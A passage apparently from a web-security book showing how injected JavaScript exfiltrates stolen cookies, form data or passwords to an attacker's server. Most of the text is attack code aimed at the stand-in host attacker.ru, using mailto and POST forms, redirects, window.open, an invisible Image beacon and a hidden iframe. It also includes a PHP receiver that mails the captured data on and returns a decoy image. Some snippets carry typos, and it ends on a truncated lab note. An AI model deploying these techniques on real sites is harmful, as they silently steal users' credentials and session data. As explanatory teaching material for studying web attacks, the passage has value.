Sending Data with JavaScript
| | ||
| | ||
| | ||
Suppose a JavaScript script has obtained some data of interest to an attacker. These can be a cookie, the contents of a form, a password thoughtlessly entered by a user into a JavaScript dialog box, and so on.
The task is to send the data to the attacker. The simplest and least reliable method would be creating a form and sending it to an e-mail address. For example, to send the value of the test variable, the attacker would embed the following code:
<script> test='abcd'; document.open(); document.write("<form name=f1 action=mailto:attacker@attackcer.ru?Subject=pass METHOD=POST ENCTYPE=multipart/form-data><input type=hidden name=data value='"+test+'"></form>"); document.close(); document.f1.submit(); </script> In this case, a mail client application with an e-mail message containing the data will start on the user's computer.
This method depends on the settings of the mail client application, on whether the user sends the message, and on many other factors. Therefore, the attacker couldn't hope that this attack would be successful. Instead, he or she could send the data using the HTTP POST method to his or her malicious script:
<script> test='abcd'; document.open(); document.write("<form name=fl action=http://www.attacker.ru/test.php METHOD=POST><input type=hidden name=data value='"+test+'"></form>"); document.close(); document.f1.submit(); </script> A drawback of this method is that the user will be redirected to that page when the data are sent from the original site. The malicious script should either return the user to the original site or simulate the original site's interface.
In the first case, the attacker would want to prevent the JavaScript code from sending the data again to avoid an infinite loop. If the amount of the data is small, the data can be sent with the HTTP GET method. The attacker can either change the form method from POST to GET or replace the current document with a document containing the address of the malicious script and pass it appropriate GET parameters:
<script> test='abcd'; document.location.href = 'http://www.attacker.ru/test.php?data='+test; </script>
This method has the same drawback as the previous one: The user will be redirected from the original site. To remedy this, the attacker would probably use the same methods . However, it would be best to use the HTTP GET method by starting the script in a new window and sending it the data:
<script> test='abcd'; window.open('http://www.attacker.ru/test.php?data='+test); </script> As a result, the malicious script will start in a new window, and the data will be sent to it with the HTTP GET method. To hide the window from the user, the attacker could minimize it and move it outside the screen. However, these manipulations can be detected by programs that watch the opening of new windows and the moving and resizing of windows . These programs are used to detect dishonest sites that artificially increase click counters.
The receiver script ( http://www.attacker.ru/test.php ) can close its window with JavaScript tools after it stores the received data or sends them further:
<script> window.close(); </close>
This is an almost unnoticeable method for sending data to an attacker because it doesn't redirect the user from the original site.
However, an entirely unnoticeable method for sending data exists. It is based on the use of the Image JavaScript object. Here is an example of such code:
<script> test="dsfsdfsdf"; idata = new Image; idata.src="http://www.attacker.ru/test.php?data="+test; </script>
This code uses the HTTP GET method to send data to the http://www.attacker.ru/test.php script as if it were an image. It doesn't matter whether the document is an actual picture or not. According to HTTP, data should be sent to a document before the document body is returned.
For greater compatibility, the http://www.attacker.ru/test.ph p script can display an actual image with appropriate headers after it stores the received data or sends them further.
| http://www.attacker.ru/test.php |
|---|
<? // Save the data; for example, send them to the attacker mail ("attacker@attacker.ru", "password", $_GET['data']); // Display an image header("Content-type: image/jpeg"); $f=fopen("121.jpg", "r"); // The 121.JPG file contains an image while($s=fread($f, 1024)) echo $s; fclose ($f); ?> |
This data-sending method may fail in some browsers.
In addition, if this method is unsuitable for example, if a large amount of data should be sent the attacker can create an HTTP POST form and set the target parameter either to a new document or to an iframe object contained in a hidden layer.
To send a form to a document opened in a new window, the attacker would send a message like this:
<script> test="NNNN"; document.open(); document.write("<form name=f1 method=POST target=_blank action=http://www.attacker.ru/attacker.php><input type=hidden name=data value='"+test+'"></form>"); document.close(); document.f1.submit(); </script> To send a form to a document opened in an iframe object contained in a hidden layer, the attacker would send a message like this:
<script> test="NNNN"; document.open(); document.write("<div style=visibility:hidden;position:absolute;width:0;height:0;><iframe name=ifl></iframe></div>"); document.write("<form name=fl method=POST target=ifl action=http://www.attacker.ru/attacker.php><input type=hidden name=data value='"+test+'"></form>"); document.close(); document.f1.submit(); </script> By using one of these methods or combining them, the attacker can send data he or she has obtained with JavaScript tools.
| Note | To resume a normal work of the http://localhost/5/1.php script, you should empty the /5/1.TXT file located in the same folder as the |
1.PHP | | ||
| | ||
| | ||
